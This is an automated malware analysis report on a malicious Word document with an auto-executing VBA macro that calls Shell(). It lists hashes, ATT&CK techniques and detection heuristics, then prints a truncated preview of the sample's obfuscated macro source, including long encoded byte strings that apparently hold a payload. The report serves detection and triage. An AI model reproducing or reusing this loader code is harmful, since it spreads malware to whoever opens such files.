Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 40df88dd524ca53d…

MALICIOUS

Office (OLE)

Size: 224.0 KB
Created: 2015-12-08 21:48:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 5646497849313cf0346924c9b476512c
SHA-1: f23cd22b7231cf756ae43fa00d6813bc55ff6c7f
SHA-256: 40df88dd524ca53d4e6caa27f2846c328eacb8b4148eb1546ff297e7f398c8d1
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is an Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this is triggered by the Document_Open auto-execution macro. This suggests the macro is designed to execute a command, likely to download and run a second-stage payload. No specific family could be identified.

Heuristics (7)

  • VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call (high) OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 37580 bytes
SHA-256: a863c4208b639ff09ae6312390f0172533429f970a7dee992ae5de1f1c921867

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function UQ2gy25Ljqb Lib "GL1n0u4ehQ9WcMym" Alias "WMnnNQem" (ByVal Nvympzz6j8 As String, GRmTF99l6feLG As Long) As Long
#Else
Private Declare Function UQ2gy25Ljqb lib "GL1n0u4ehQ9WcMym" Alias "WMnnNQem"(byval Nvympzz6j8 as String, GRmTF99l6feLG as Long ) as Long
#End If
Sub Jx9MAmZI1YY()
DrpRx = 32
YrxWDtg3 = 18 + 87 + 52 + 57
On Error Resume Next
CiddIq = 25
RceoYIjNnqU = 71 + 6 + 55 + 6
Dim SfO0a3ua0qeB As String, Yq0KtpaIOEb() As String, UP6g2iLcl As Integer
Q9LWJq56QUe = 30
Qbn8Gbnmk = 10 + 70 + 61 + 62
SfO0a3ua0qeB = SfO0a3ua0qeB & "239,240,202,226,237,202,20,20,118,61,89,64,8,123,65,57,62,40,69,2,3,54,40,1,110,114,80,12,22,30,45,99,60,102,115,103,69,85,105,74,5,11,47,56,88,38,125,34,25,71,117,84,59,17,44,36,45,99,35,54,22,30,51,42,98,67,97,67,57,7,119,70,94,112,118,76,37,32,27,15,116,81,1,96,69,105,67,119,99,69,108,56,96,23,4,25,7,21,68,127,102,67,91,98,80,81,119,61,73,9,86,18,80,28,56,96,28,35,37,49,31,13,76,72,91,125,110,28,233,174,132,175,227,238,201,247,245,228,214,152,233,216,221,192,247,243,197,246,244,248,213,144,235,219,203,187,178,166,209,146,169,180,134,198,154,172,167,145,220,183,139,134,210,175,245,188,163,177,130,129,186,170,173,183,209,212,239,206,130,173,237,147,197,207,254,208,224,227,195,166,170,227,247,199,190,212,129,183,187,173,149,192,209,216,133,132,175,191,133,169,163,164,139,204,147,193,243"
XVbMrEtK3pd = 58
KikG8gXEuHqMf = 51 + 73 + 6 + 34
SfO0a3ua0qeB = SfO0a3ua0qeB & ",196,245,250,192,214,230,132,160,248,235,253,249,218,205,209,232,228,221,215,204,253,222,245,32,45,54,86,56,35,107,127,65,16,126,71,65,82,109,127,71,0,34,56,13,30,97,81,39,56,26,58,32,43,29,55,20,101,59,23,206,192,166,226,140,136,123,106,93,26,121,58,39,56,61,40,11,17,97,15,53,66,16,18,29,50,125,112,83,107,96,114,124,50,69,115,119,106,65,68,114,76,74,70,105,44,93,109,97,16,27,1,123,35,8,24,109,42,73,19,24,109,18,37,71,107,109,87,66,50,32,106,75,105,47,61,1,78,112,108,68,22,106,94,73,17,89,96,125,110,80,99,82,4,68,75,86,86,23,101,35,117,95,68,110,59,104,83,91,96,95,120,41,67,106,15,47,15,31,113,60,80,105,67,65,12,25,123,129,195,169,140,131,183,175,182,147,132,243,254,205,136,147,196,193,213,247,148,175,163,145,176,132,240,136,142,223,217,228,233,253,196,203,206,241,220,176,140,189,151,20"
W1C5oj4 = 92
OzmVYN = 48 + 8 + 4 + 68
SfO0a3ua0qeB = SfO0a3ua0qeB & "5,192,227,217,211,194,236,162,212,229,231,250,209,216,239,220,218,214,242,185,205,253,145,225,236,248,139,207,189,252,210,152,255,250,219,219,249,219,147,180,200,196,215,141,239,230,218,244,169,239,199,210,185,178,210,227,221,231,238,216,141,145,197,192,147,244,215,166,137,249,206,185,149,252,238,243,250,131,214,141,97,72,80,25,72,99,43,104,105,10,25,114,50,86,56,95,56,11,75,97,103,98,69,103,115,34,40,58,18,9,54,11,48,7,75,19,142,85,67,76,108,124,70,2,60,36,11,98,121,57,57,4,36,96,69,125,101,103,76,4,108,69,76,111,70,66,116,65,69,75,97,46,90,104,122,27,15,12,96,36,32,11,47,111,55,37,13,104,28,24,30,89,75,83,43,33,85,97,68,101,77,114,98,104,97,115,20,54,91,71,115,3,32,69,85,39,47,119,89,47,68,12,113,16,56,56,6,23,104,30,82,101,6,54,85,56,25,15,61,26,100,17,94,119,19,32,68,35,1,21,94,14,7"
XA2WgoG = 23
QdYhfR2 = 18 + 6 + 41 + 35
SfO0a3ua0qeB = SfO0a3ua0qeB & ",7,58,124,29,45,73,215,128,231,170,244,139,250,182,136,239,218,202,216,242,234,216,231,159,253,200,135,230,164,177,180,179,135,174,234,244,250,193,177,208,226,149,152,210,158,138,205,223,199,228,170,220,238,252,246,178,221,175,185,167,150,163,216,131,183,253,153,141,176,145,221,170,178,148,206,165,132,159,140,188,172,132,162,166,181,137,195,171,144,150,132,176,160,154,206,247,227,140,170,189,210,202,253,255,148,177,129,255,241,228,176,208,219,233,193,158,218,244,255,148,216,193,179,194,221,232,249,150,112,127,122,9,91,105,105,20,9,6,33,116,39,59,124,107,101,92,29,9,5,72,59,19,29,3
... (truncated)